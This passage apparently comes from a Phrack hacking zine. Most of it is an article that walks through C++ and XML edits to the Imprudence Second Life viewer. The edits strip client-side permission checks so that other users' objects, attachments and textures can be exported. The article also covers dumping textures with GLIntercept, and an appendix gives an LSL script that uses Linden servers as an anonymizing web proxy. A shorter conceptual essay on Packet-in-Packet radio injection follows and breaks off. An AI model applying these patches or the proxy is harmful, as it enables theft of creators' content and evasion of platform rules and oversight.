the SIMs by "teleporting" from one SIM to the other. Technically, that
just means that the viewer is instructed to connect to the address of a
different SIM.

A viewer is really just a Linden version of a web browser (literally) which
relies on loads of Open Source software to run. It renders the textures
around you by transferring them from an asset server. The asset server is
just a container that stores all the content users upload onto Second Life.
Whenever you connect to a SIM, all the content around you gets transferred
to your viewer, just like surfing a website.

There are a few content types in Second Life that can be uploaded by users:

  1.) Images
  2.) Sounds
  3.) Animations

Whenever I talk about "textures", I am talking about the images that users
have uploaded onto Second Life. In order to upload one of them onto Second
Life, you have to pay 10 Linden dollars. Linden maintains a currency
exchange from Linden dollars to real dollars.

At any point, depending on the build permission of the SIM you are
currently on, you are able to create objects. Those are just basic
geometric shapes called primitives, (or prims for short) such as cubes,
spheres, prisms, etc... After you created a primitive, you can decorate
it with images or use the Linden Scripting Language LSL [3] to trigger
the sounds you uploaded or animate avatars like yourself. There is a lot
to say about LSL, but it exceeds the scope of the article. You can also
link several such primitives together to form a link set which, in turn,
is called an object. (LISP fans dig in, Second Life is all about lists -
everything is a list.)

Coming back to avatars, your avatar has so called attachment-points which
allow you to attach such an object to yourself. Users create content, such
as hats, skirts, and so on and they sell them to you and you attach them to
these attachment points.

In addition to that, there are such things called wearables. Those are
different from attachments because they are not made up of objects but they
are rather simple textures that you apply to yourself. Those do not have
any geometric properties in-world and function on the principle of layers,
hiding the layer underneath. Finally, you have body parts which are also
just textures. For example, eyes, your skin.

The wearable layers get superimposed (baked) on you. For example, if you
wear a skin and a T-shirt, the T-shirt texture will hide part of the skin
texture underneath it.

We are going to take a standard viewer: we will use the Imprudence [4]
viewer, the current git version of which has such an export feature and we
are going to modify it so it will allow exports of any in-world object.
Later on, the usage of GLIntercept [7] will be mentioned since it can be
used to export the wearables and the body parts mentioned which are just
textures.

Why does this work? There are a number of restrictions which are enforced
by the server, and a number of actions that the server cannot control. For
example, every action you trigger in Second Life usually gets a permission
check with the SIM you are triggering the action on. Your viewer interprets
the response from the SIM and if it is given the green light, your viewer
goes ahead and performs the action you requested.

Say, for example, that the viewer does not care whether the SIM approves it
or not and just goes ahead and does it anyway. Will that work? It depends
whether the SIM checks again. Some viewers have a feature called "Enable
always fly.", which allows you to fly around in no-fly zones which is an
instance of the problem. The SIM hints the viewer that it is a no-fly zone,
however the viewer ignores it and allows you to fly regardless.

Every avatar is independent in this aspect and protected from other avatars
by a liability dumping prompt. Whenever an avatar wants to interact with
you, you are prompted to allow them permission to do so. However, the
graphics are always displayed and your viewer renders other avatars without
any checks. One annoyance, for example, is to spam particles generated by
LSL. Given a sufficiently slow computer, your viewer will end up
overwhelmed and crash eventually. These days, good luck with that...

But how do we export stuff we do not own, doesn't the server check for
permissions? Not really, we are not going to "take" the object in the sense
of violating the Second Life permissions. We are going to scan the object
and note down all the parameters that the viewer can see. We are then going
to store that in an XML file along with the textures as well. This will be
done automatically using Imprudence's "Export..." feature.

Whenever you upload any of the content types mentioned in the previous
chapter, the Linden asset server generates an asset ID which is basically
an UUID that references the content you uploaded. The asset server
(conveniently for us) does not carry out any checks to see whether there is
a link between an object referencing that UUID and the original uploader.
Spelled out, if you manage to grab the UUID of an asset, you can reference
it from an object you create.

For example, if a user has uploaded a texture and I manage to grab the UUID
of the texture generated by the asset server, then I can use LSL to display
it on the surface of a primitive. It is basically just security through
obscurity (and bugs)...

------[ I. Part I - Objects

The "Export..." feature on the viewers we attack is not an official feature
but rather a feature implemented by the developers of the viewers
themselves. That generally means that the viewer only implements certain
checks at the client level without them being enforced by the server. The
"Export..." feature is just a dumb feature which scans the object's
measurements, grabs the textures and dumps the data to an XML file and
stores image files separately.

Since it is a client-side check, we can go ahead and download Imprudence
(the same approach would work on the Phoenix [5] client too) and knock out
all these viewer checks.

After you cloned the Imprudence viewer from the git repo, the first file we
edit is at linden/indra/newview/primbackup.cpp.

Along the very fist lines there is a routine that sets the default
textures, I do not think this is needed to make our "Export..." work, but
it is a good introduction to what is going on in this article:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
void setDefaultTextures()
{
    if (!gHippoGridManager->getConnectedGrid()->isSecondLife())
    {
        // When not in SL (no texture perm check needed), we can
        // get these defaults from the user settings...
        LL_TEXTURE_PLYWOOD =
            LLUUID(gSavedSettings.getString("DefaultObjectTexture"));
        LL_TEXTURE_BLANK =
            LLUUID(gSavedSettings.getString("UIImgWhiteUUID"));
        if (gSavedSettings.controlExists("UIImgInvisibleUUID"))
        {
            // This control only exists in the
            // AllowInvisibleTextureInPicker patch
            LL_TEXTURE_INVISIBLE =
                LLUUID(gSavedSettings.getString("UIImgInvisibleUUID"));
        }
    }
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The viewer uses a method isSecondLife() to check if it is currently on the
official grid. Depending on the outcome of this method, the viewer
internally takes decisions on whether certain things are allowed so that
the viewer will conform to the Linden third-party viewer (TPV) policy [6].
The TPV policy is a set of rules that the creator of a viewer has to
respect so that the viewer will be granted access to the Second Life grid
(ye shall not steal, ye shall not spam, etc...).

However, these checks are client-side only. They are used internally within
the viewer and they have nothing to do with the Linden servers. What we do,
is knock them out so that the viewer does not perform the check to see if
it is on the official grid. In this particular case, we can knock out the
check easily by eliminating the if-clause, like so:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
void setDefaultTextures()
{
    //if (!gHippoGridManager->getConnectedGrid()->isSecondLife())
    //{
          // When not in SL (no texture perm check needed), we can
          // get these defaults from the user settings...
          LL_TEXTURE_PLYWOOD =
              LLUUID(gSavedSettings.getString("DefaultObjectTexture"));
          LL_TEXTURE_BLANK =
              LLUUID(gSavedSettings.getString("UIImgWhiteUUID"));
          if (gSavedSettings.controlExists("UIImgInvisibleUUID"))
          {
              // This control only exists in the
              // AllowInvisibleTextureInPicker patch
              LL_TEXTURE_INVISIBLE =
                  LLUUID(gSavedSettings.getString("UIImgInvisibleUUID"));
          }
    //}
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Without this check, the viewer assumes that we are on any grid but the
Second Life grid. You probably can notice that these checks are completely
boilerplate.

Let us move on to the next stop. Somewhere in
linden/indra/newview/primbackup.cpp you will find the following:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
bool PrimBackup::validatePerms(const LLPermissions *item_permissions)
{
    if(gHippoGridManager->getConnectedGrid()->isSecondLife())
    {
        // In Second Life, you must be the creator to be permitted to
        // export the asset.
        return (gAgent.getID() == item_permissions->getOwner() &&
            gAgent.getID() == item_permissions->getCreator() &&
            (PERM_ITEM_UNRESTRICTED & item_permissions->getMaskOwner())
            == PERM_ITEM_UNRESTRICTED);
    }
    else
    {
        // Out of Second Life, simply check that you're the owner and the
        // asset is full perms.
        return (gAgent.getID() == item_permissions->getOwner() &&
            (item_permissions->getMaskOwner() & PERM_ITEM_UNRESTRICTED)
            == PERM_ITEM_UNRESTRICTED);
    }
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

This checks to see if you have full permissions, and are the owner and the
creator of the object you want to export. This only applies to the Second
Life grid. If you are not on the Second Life grid, then it checks to see if
you are the owner and have full permissions. We will not bother and will
modify it to always return that all our permissions are in order:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
bool PrimBackup::validatePerms(const LLPermissions *item_permissions)
{
    return true;
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The next stop is in the same file, at the following method:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
LLUUID PrimBackup::validateTextureID(LLUUID asset_id)
{
    if (!gHippoGridManager->getConnectedGrid()->isSecondLife())
    {
        // If we are not in Second Life, don't bother
        return asset_id;
    }

    LLUUID texture = LL_TEXTURE_PLYWOOD;
    if (asset_id == texture ||
            asset_id == LL_TEXTURE_BLANK ||
            asset_id == LL_TEXTURE_INVISIBLE ||
            asset_id == LL_TEXTURE_TRANSPARENT ||
            asset_id == LL_TEXTURE_MEDIA)
    {
        // Allow to export a grid's default textures
        return asset_id;
    }
    LLViewerInventoryCategory::cat_array_t cats;

// yadda, yadda, yadda, blah, blah, blah...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

There is a complete explanation of what this does in the comments. This
checks to see whether you are in Second Life, and if you are, it goes
through a series of inefficient and poorly coded checks to ensure that you
are indeed the creator of the texture by testing whether the texture is in
your inventory. We eliminate those checks and make it return the asset ID
directly:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
LLUUID PrimBackup::validateTextureID(LLUUID asset_id)
{
    return asset_id;
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Once you compile the modified viewer, you will be able to export any
object, along with its textures that you can see in-world. The next step is
to modify the skin (i.e. Imprudence's user interface) so that you may 
export attachments from the GUI.

First, let us enable the pie "Export..." button. I will assume that you use
the default skin. The next stop is at
linden/indra/newview/skins/default/xui/en-us/menu_pie_attachment.xml. You
will need to add:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    <menu_item_call enabled="true" label="Export" mouse_opaque="true"
        name="Object Export">
        <on_click function="Object.Export" />
        <on_enable function="Object.EnableExport" />
    </menu_item_call>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Now, we need to enable it for any avatar at
linden/indra/newview/skins/default/xui/en-us/menu_pie_avatar.xml. You will
need to add:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    <menu_item_call enabled="true" label="Export" mouse_opaque="true"
        name="Object Export">
        <on_click function="Object.Export" />
        <on_enable function="Object.EnableExport" />
    </menu_item_call>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

After that, we must add them so the viewer picks up the skin options. We
open up linden/indra/newview/llviewermenu.cpp and add in the avatar pie
menu section:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
// Avatar pie menu
...
    addMenu(new LLObjectExport(), "Avatar.Export");
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

We do the same for the attachments section:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
// Attachment pie menu
...

    addMenu(new LLObjectEnableExport(), "Attachment.EnableExport");
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Now we are set. However, the viewer performs a check in "EnableExport" in
linden/indra/newview/llviewermenu.cpp which we need to knock out:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
class LLObjectEnableExport : public view_listener_t
{
    bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
    {
        LLControlVariable* control =
            gMenuHolder->findControl(userdata["control"].asString());

        LLViewerObject* object =
        LLSelectMgr::getInstance()->getSelection()->getPrimaryObject();

        if((object != NULL) &&
            (find_avatar_from_object(object) == NULL))
        {

// yadda, yadda, yadda, blah, blah, blah...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The code initially checks whether the object exists, if it is not worn by
an avatar, and then applies permission validations to all the children
(links) of the object. If the object exists, if it is not worn by an avatar
and all the permissions for all child objects are correct, then the viewer
enables the "Export..." control. Since we do not care either way, we enable
the control regardless of any checks.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
class LLObjectEnableExport : public view_listener_t
{
    bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
    {
        LLControlVariable* control =
            gMenuHolder->findControl(userdata["control"].asString());

        LLViewerObject* object =
        LLSelectMgr::getInstance()->getSelection()->getPrimaryObject();

        if(object != NULL)
        {
            control->setValue(true);
            return true;

// yadda, yadda, yadda, blah, blah, blah...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

I have left the NULL check for the object since if you happen to mis-click
and select something other than an object, then the "Export..." pie menu
will be enabled and your viewer will crash. More precisely, if you instruct
the viewer to export something using the object export feature, and it is
not an object, the viewer will crash since there are no checks performed
after this step.

Further on in linden/indra/newview/llviewermenu.cpp there is another test
to see whether the object you want to export is attached to an avatar. In
that case, the viewer considers it an attachment and disallows exporting.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
class LLObjectExport : public view_listener_t
{
    bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
    {
        LLViewerObject* object =
        LLSelectMgr::getInstance()->getSelection()->getPrimaryObject();
        if (!object) return true;

        LLVOAvatar* avatar = find_avatar_from_object(object);

        if (!avatar)
        {
            PrimBackup::getInstance()->exportObject();
        }

        return true;
    }
};
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Again, we proceed the same way and knock out that check which will allow
us to export objects worn by any avatar:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
class LLObjectExport : public view_listener_t
{
    bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
    {
        PrimBackup::getInstance()->exportObject();

        return true;
    }
};
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

These changes will be sufficient in order to transform your viewer into an
undetectable tool that will allow you to export any object along with the
associated textures.

There are indeed easier ways, for example toggling God mode from the
source code and bypassing most checks. However, that will be discussed
in the upcoming full article, along with explanations on what Linden are
able to detect and wearable exports.

Alternatively, and getting closer to a "bot", there are ways to program
a fully non-interactive client [11] that will export everything it sees
automatically. This will also be covered in the upcoming article since it
takes a little more than hacks. The principle still holds: "who controls
an asset UUID, has at least permission to grab the asset off the asset
server".

------[ II. Part II - Textures

In the first part we have talked about exporting objects. There is more fun
you can have with the viewer too, for example, grabbing any texture UUID,
or dumping your skin and clothes textures.

What can we do about clothes? If you have an outfit you would like to grab,
with the previous method you will only be able to export primitives without
the wearable clothes. How about backing up your skin?

The 1.x branch of the Linden viewer has an option, disabled by default and
only accessible to grid Gods, which will allow you to grab baked textures.
Grid Gods are essentially Game Masters and in the case of Second Life, they
consist of the "Linden"s, which are Linden Labs employees represented
in-world by avatars, conventionally having "Linden" as their avatar's last
name.

We open up linden/indra/newview/llvoavatar.cpp and we find:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
BOOL LLVOAvatar::canGrabLocalTexture(ETextureIndex index)
{
    // Check if the texture hasn't been baked yet.
    if (!isTextureDefined(index))
    {
        lldebugs << "getTEImage( " << (U32) index << " )->getID()
            == IMG_DEFAULT_AVATAR" << llendl;
        return FALSE;
    }

    if (gAgent.isGodlike() && !gAgent.getAdminOverride())
        return TRUE;

// yadda, yadda, yadda, blah, blah, blah...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Aha, so it seems that grid Gods are permitted to grab textures. That is
fine, so can we:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
BOOL LLVOAvatar::canGrabLocalTexture(ETextureIndex index)
{
    // Check if the texture hasn't been baked yet.
    if (!isTextureDefined(index))
    {
        lldebugs << "getTEImage( " << (U32) index << " )->getID()
            == IMG_DEFAULT_AVATAR" << llendl;
        return FALSE;
    }

    return TRUE;

    if (gAgent.isGodlike() && !gAgent.getAdminOverride())
        return TRUE;

// yadda, yadda, yadda, blah, blah, blah...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

But that is not sufficient. The 1.x viewer code has an error (perhaps
intentional) which will crash the viewer when you try to grab the lower
part of your avatar. In the original code at
linden/indra/newview/llviewermenu.cpp, we have:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        else if ("lower" == texture_type)
        {
            handle_grab_texture( (void*)TEX_SKIRT_BAKED );
        }
        else if ("skirt" == texture_type)
        {
            handle_grab_texture( (void*)TEX_SKIRT_BAKED );
        }
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Which must be changed to:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        else if ("lower" == texture_type)
        {
            handle_grab_texture( (void*)TEX_LOWER_BAKED );
        }
        else if ("skirt" == texture_type)
        {
            handle_grab_texture( (void*)TEX_SKIRT_BAKED );
        }
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

You are free to recompile and go to the menu and dump the textures on you,
including your skin. To grab your skin, you can undress your avatar and
grab the textures. You can then export them using the method from Part I.
For clothes, you would do the same by clothing your avatar, grabbing the
relevant textures and then exporting them using the method from Part I.

You might notice that the texture that will be dumped to your inventory is
temporary. That is, it is not an asset and registered with the asset
server. Make sure you save the texture, or, if you want to save a bunch of
them, consider reading the first part of the article and place the textures
on a primitive and export the entire primitive.

Since the textures are baked, they represent an overlay of your skin and
your clothes. If you want to extract just the clothes, you might need to
edit the grabbed textures in a graphics editing program to cut out the skin
parts. However, it might be possible to use a transparent texture for your
skin when you grab the textures. In that case, you will not have to edit
the clothes at all.

------[ II. Part II - Textures
            II. i. Textures - GLIntercept

The GLIntercept method involves grabbing a copy of GLIntercept and
replacing the .dll file with the GLIntercept one. By doing that, when you
run the Second Life viewer, all the textures will be stored to your hard
drive in the images directory. It is a resource consuming procedure because
any texture that your viewer sees is saved to your hard-drive.

Therefore, if your only interest is to allot a collection of textures, then
get GLIntercept and, after installing it, replace the opengl .dll from your
viewer directory with the one from GLIntercept. If you cannot find the
viewer's opengl .dll, then just copy it as a new file because the viewer
will pick it up. I recommend setting your graphics all the way to low and
taking it easy because in the background, the GLIntercept .dll will create
an images directory and dump all the possible textures, including the
textures belonging to the UI.

There is a lot of fuss going on about GLIntercept. Some strange people say
it does not work anymore and some funny people come up with ideas like
encrypting the textures. The principle that GLIntercept works on is trivial
to the point of making the whole fuss meaningless. GLIntercept, when used
in conjunction with the viewer is an extra layer between your viewer and
opengl. Anything that your graphics card renders can be grabbed - together
with other similar software [8], the same effect described in this article,
however it would require you to convert the structures to the Second Life
format. The usage of GLIntercept is not restricted to Second Life, you can
go ahead and grab anything you like from any program that uses opengl. It
literally puts a dent (crater?) into content stealing, the important phrase
being: "anything that your graphics card renders, can be grabbed".

------[ IV. Postamble

Second Life is a vanity driven virtual universe which is plagued by the
most horrible muppets that fake anonymity could spawn. The Lindens maintain
full control and all the content you upload automatically switches
ownership to Linden Labs via the Terms of Service which make you renounce
your copyright. Not only that, but there are plenty of rumours you are
tracked and they have a dodgy "age-verification" system in place which
forces you to send your ID card to be checked by "a third party". Under
these circumstances, it is of course questionable what they do with that
data and whether they link your in-world activities to your identity.

There is more that could be potentially done, the viewers are so frail and
incredibly poorly coded from all perspectives and certainly not the quality
you would expect from an institution that makes billions of shineys. There
have been exploits before such as Charlie Miller's Quicktime exploit [9]
which was able to gain full control of your machine (patched now) and
Michael Thumann's excellent presentation which goes over many concepts of
Second Life as well as how they can be abused [10].

One of the further possibilities I have been looking into (closely related
to Michael Thumann's presentation) is to use LSL and create an in-world
proxy that will enable your browser to connect to a primitive in-world and
bounce your traffic. There is a limitation imposed on the amount of
information an LSL script can retrieve off the web, however I am still
looking into way to circumvent that. Essentially the idea would be to use
the Linden Labs servers as a proxy to carry out all the surfing. At the
current time of writing this article, I do have a working LSL
implementation (you can see an example of that in [A. 1]) that can grab 2kb
off any website (this is a limitation imposed by the LSL function
llHTTPRequest()). Additionally, a PHP page could be created that rewrites
the content sent back by the LSL script and so that the links send the
requests back through the script in Second Life.

Not only IPs, but headers, timezone, DNS requests and everything else gets
spoofed that way.

The possibilities are limitless and I have seen viewers emerge that rely on
this concept, such as CryoLife or NeilLife. However, the identification
strings sent by the few versions lying around the net have been tagged and
any user connecting with them would be banned. If you want to amuse
yourself further, you may want to have a look at:

http://wiki.secondlife.com/wiki/User:Crone_Dryke

Dedicated to CV. Many thanks to the Phrack Staff for their help and their
interest in the article.

Thank you for your time!

------[ B. Bibliography

[1] The Second Life website,
    http://secondlife.com/
[2] Linden Labs official website,
    http://lindenlab.com/
[3] Linden Scripting Language LSL Wiki,
    http://wiki.secondlife.com/wiki/LSL_Portal
[4] Imprudence Viewer downloads,
    http://wiki.kokuaviewer.org/wiki/Imprudence:Downloads
[5] The Phoenix Viewer,
    http://www.phoenixviewer.com/
[6] The third-party viewer policy,
    http://secondlife.com/corporate/tpv.php
[7] GLIntercept,
    http://oreilly.com/pub/h/5235
[8] Ogre exporters,
    http://www.ogre3d.org/tikiwiki/OGRE+Exporters
[9] QuickTime exploit granting full access to a users machine,
    http://securityevaluators.com/content/case-studies/sl/
[10] Thumann's presentation on possibilities how to exploit Second Life,
     https://www.blackhat.com/presentations/bh-europe-08/Thumann/
     Presentation/bh-eu-08-thumann.pdf
[11] OpenMetaverse Library for Developers,
     http://lib.openmetaverse.org/wiki/Main_Page

------[ A. Appendix

[A. 1] LSL script which requests an publicly accessible URL from the
current SIM it is located on, and answers any proxies HTTP requests by
accessing the public URL, suffixed with "/url=<some URL>" where "some URL"
represents a web address. The script fetches 2k of the content and then
sends it back to the browser.

key uReq;
key sReq;

default
{
    state_entry()
    {
        llRequestURL();
    }

    changed(integer change)
    {
        if (change & CHANGED_INVENTORY) llResetScript();
    }

    http_request(key id, string method, string body)
    {
        if (method == URL_REQUEST_GRANTED) {
            llOwnerSay(body);
            return;
        }
        if (method == "GET") {
            uReq = id;
            list pURL = llParseString2List(
                llGetHTTPHeader(id, "x-query-string"), ["="], []);
            if (llList2String(pURL, 0) == "url")
                sReq = llHTTPRequest(llList2String(pURL, 1),
                    [HTTP_METHOD, "GET"], "");
        }
    }
    http_response(key request_id,
        integer status,
        list metadata,
        string body)
    {
        if (sReq == request_id) llHTTPResponse(uReq, 200, body);
    }
}


|=[ 0x06 ]=---=[ How I misunderstood digital radio; or,
                 "Weird machines" are in radio, too! - M.Laphroaig
                                                       pastor@phrack ]--=|

                          ...there be bytes in the air
                             and Turing machines everywhere

When one lays claim to generalizing a class of common misconceptions,
it is fitting to start with one's own.  These are the things I used to
believe about digital radio -- or, more precisely, would not have
questioned if explicitly presented with them.

=== Wishful thinking ===

The following statements are obviously related and mutually
reinforcing:

1. Layer 1 delivers frames to Layer 2 either fully intact frames
   exactly as transmitted by a peer in their entirety, or slightly
   corrupted versions of such frames if CRC checking in Layer 1 is
   disabled, as it sometimes is for sniffing.

2. In order to be received at Layer 1, a frame must be transmitted
   with proper encapsulation by a compatible Layer 1 transmitter using
   the exact same PHY protocol. There is no substitution in commodity
   PHY implementations for the radio chip circuitry activated when the
   chip starts transmitting a queued Layer 2 frame, except by use of
   an expensive software defined radio.

3. Layer 1 implementations have means to unambiguously distinguish
   between the radio transmission that precedes a frame -- such as the
   frame's preamble -- and the frame's actual data. One cannot be
   mistaken for another, or such a mistake would be extremely rare and
   barely reproducible.

4. Should a receiver miss the physical beginning of a frame
   transmission on the air due to noise or a timing problem, the rest
   of the transmission is wasted, and no valid frame could be received
   at least until this frame's transmission is over.

For Layer 1 injection, this would imply the following limitations:

a. In order to successfully "inject" a crafted Layer 1 frame (that is,
   to have it received by the target) the attacker needs to (1) build
   the binary representation of the full frame in a buffer, (2)
   possess a radio capable of transmitting buffer binary contents, and
   (3) instruct the radio to transmit the buffer, possibly bypassing
   hardware or firmware implementations of protocol features that may
   alter or side-effect the transmission.

b. In particular, the injecting radio must perfectly cooperate by
   producing the proper encapsulating physical signals for the
   preamble, etc., around the injected buffer-held frame. Without such
   cooperation, injection is not possible.

c. Errors due to radio noise can only break injection.  The injecting
   transmission, as a rule, needs to be more powerful to avoid being
   thwarted by ambient noise.

d. Faraday cages are the ultimate protection against injection, as
   long as the nodes therein maintain their software and hardware
   integrity, and do not afford any undue privileges to the attacker.

A high-level summary of these beliefs could be stated like
this: the OSI Layer 1/Layer 2 boundary in digital radio is a _validity
and authenticity filter_ for frames. In order to be received, a frame
must be transmitted in its entirety via an "authentic" mechanism, the
transmitting chip's logic going through its normal or nearly normal
state transitions, or emulated by a software-defined radio.

Each and every one of these is _false_, as demonstrated by the
existence of Packet-in-Packet (PIP) [1,2] exploits.

=== A Packet Breaks Out ===

On a cold and windy February 23rd of 2011, my illusions came to an
abrupt end when I saw the payload bytes of an 802.15.4 frame's data
--- transmitted inside a valid packet as a regular payload ---
received as a frame of its own, reproducibly.

The "inner" packet, which I believed to be safely contained within the
belly of the enclosing frame would occasionally break out and arrive
all by itself, without any sign of the encapsulating packet.

Every once in a while, there was no whale, just Jonah. It was a very
unwelcome miracle for someone who believed he could be safe from even
SDR-wielding attackers inside a cozy Faraday cage, as long as his
utopian gated community had no compromised nodes.

Where was my encapsulation now? Where was my textbook's OSI model?

Lies, all lies. Sweet illusions shattered by cruel Packet-in-Packet,
the textbook illusion of neat encapsulation chief among them. How the
books lied.

=== Packet-in-Packet: a miracle explained ===

The following is a typical structure of a digital radio frame
as seen by the radio:

------+----------+-----+-------------------------------+-----+------
noise | preamble | SFD | L2 frame reported by sniffers | CRC | noise
------+----------+-----+-------------------------------+-----+------

The receiving radio uses the preamble bytes to synchronize itself, at
the same time looking for SFD bytes digitally. Once a sequence of SFD
bytes matches, the radio starts treating further incoming bytes as the
content of the frame, saving them and feeding them into its checksum
computation.

Consider the situation when the "L2 payload bytes" transmitted after
the SFD themselves contain the following, say, as a valid payload of
a higher layer protocol:

---------+-----+--------------------+--------------------------------
preamble | SFD | inner packet bytes | valid checksum for inner packet
---------+-----+--------------------+--------------------------------

If the original frame's preamble and SFD are intact, all of the above
will be received and passed on to the driver and the OS as regular
payload bytes as intended.

Imagine, however, that the original SFD is damaged by noise and missed
by the radio. Then the initial bytes of the outer frame will be
interpreted as noise, leading up to the embedded "preamble" and "SFD"
of the would-be payload. Instead, these preamble and SFD will be taken
to indicate an actual start of a real frame, and the "inner" packet
will be heard, up to an including the valid checksum.  The following
bytes of the enclosing frame will again be dismissed as noise, until
another sequence of "preamble + SFD" is encountered.

Thus, due to noise damaging the real SFD and the receiver's inability
to tell noise bytes from payload bytes except by matching for an SFD,
the radio will occasionally receive the inner packet -- precisely as
if it were sent alone, deliberately.

Thus a remote attacker capable of controlling the higher level
protocol payloads that get transmitted over the air by one of the
targeted radios on the targeted wireless network is essentially
capable of occasionally injecting crafted Layer 1 frames -- without
ever owning any radio or being near the targeted radios' physical
location.

Yes, Mallory, there is such a thing as Layer 1 wireless injection
without a radio. No, Mallory, a mean, nasty Faraday cage will not
spoil your holiday.

=== The reality ===

Designers of Layer 2 and above trust Layer 1 to provide valid or
"authentic" objects (frames) across the layer boundary.  This trust is
misplaced.

There are two factors that likely contribute to it among network
engineers and researchers who are not familiar with radio Layer 1
implementations but have read driver and code in the layers above.

Firstly, the use of the CRC-based checking throughout the OSI mode
layers likely reinforces the faith in the ability of Layer 1 to detect
errors -- any symbol errors that accidentally corrupt the encapsulated
packet's structure while on the wire.

Secondly, the rather complex parsing code required for Layer 2 and
above to properly de-encapsulate respective payloads may lead its
readers to believe that similarly complex algorithms take place in
hardware or firmware in Layer 1.

However, L1 implementations are neither validity, authenticity, or
security filters, nor do they maintain complex enough state or context
about the frame's bytes they are receiving.

Aside from analog clock synchronization, their anatomy is nothing more
than that of a finite automaton that pulls bytes (more precisely,
symbols of the code that encodes the transmitted bytes, which differ
per protocol, both in bits/symbol and in modulation) out of the air,
continually.

The inherently noisy RF medium produces a constant stream of symbols.
The probability of hearing different symbols is actually non-uniform
and depends on the details of modulation and encoding scheme, such as
its error-correction.

As it receives the symbol stream, this automaton continually compares
a narrow window within the stream against the SFD sequence known to
start a frame. Once matched by this shift register, the symbols start
being accumulated in a buffer that will eventually be checksummed and
passed to the Layer 2 drivers.

Beyond the start-of-frame matching automation, the receiver has no
other context to determine whether symbols are in-frame payload, our
out-of-frame noise. It has no other concept of encapsulation or frame
validity.  A digital radio is just a machine for pulling bytes out of
the air.  It has weird machines in that same way -- and for the same
reasons -- that a vulnerable C program has weird machines.

Such encapsulation based on such a simple automaton is easily and
frequently broken in presence of errors. All that is needed is for the
chip's idea of the start-of-frame sequence -- typically, some of the
preamble + a Start of Frame Delimiter, a.k.a. Sync, or just the
latter where the preamble is used exclusively for analog
synchronization -- to not match, for the subsequent payload bytes to be
mistaken for the start-of-frame sequence or noise.

In fact, to mislead the receiving automaton to the _intended meaning_
of symbols (or bytes they are supposed to make up or come from) no
crafting manipulation is necessary: the receiving machine is so simple
that _random noise_ alone provides sufficient "manipulation" needed to
confuse its state and allow for packet-in-packet injection.

Thus injection for attackers without an especially cooperative radio
or in fact any radio at all -- so long as the attacker can leverage
some radio near the target to produce a predictable stream of symbols
-- is enabled by broken encapsulation.

=== What does this remind me of? ===

I remember the first time I witnessed a buffer overflow exploit, when
my Internet-facing Linux box, name Miskatonic, was exploited.  Whoever
did that also opened a whole new world to me, and I'll be happy to
repay that debt with a beer should we ever meet in person.

At that time, I was a fairly competent C programmer, but I saw the
world in terms of functions that called other functions.  Each of
these functions returned after being called to whichever address it
had been called from. I thought that the only way for a piece of code
to ever get executed was to be inside a function called at some point.

In other words, I regarded C functions as "atomic" abstractions.  Even
though I implemented simple recursion and mutually recursive functions
via my own stacks a few times, it never occurred to me that a real
call stack could be anything other than a neat and perfect data
structure with "push", "pop", and referencing of variable slots.

Beware layers of abstractions. Take their expected, specified
operation on faith, and they will appear real. It is tempting to trust
a lower abstraction layer to provide _only_ the valid data structures
your next layer expects to receive, to assume that the lower layer's
designers already took responsibility for it. It is so tempting to
limit your considerations to the detail and complexity of the layer
you are working in.

Thus the layers of abstraction become boundaries of competence.

This temptation is overpowering on well-designed, abstraction-oriented
environments, where you lack any legal or effective means of PEEK-ing
or POKE-ing the underlying layers.  Dijkstra decried BASIC as a
mind-mutilating language, but most real BASICs had PEEK and POKE to
explore the actual RAM, and one sooner or later found himself
wondering what they did. I wonder what Dijkstra would have said about
Java, which entirely traps the mind of a programmer in its
abstractions, with no hint of any other ways or idioms of programming.


=== How we could have avoided falling for it ===

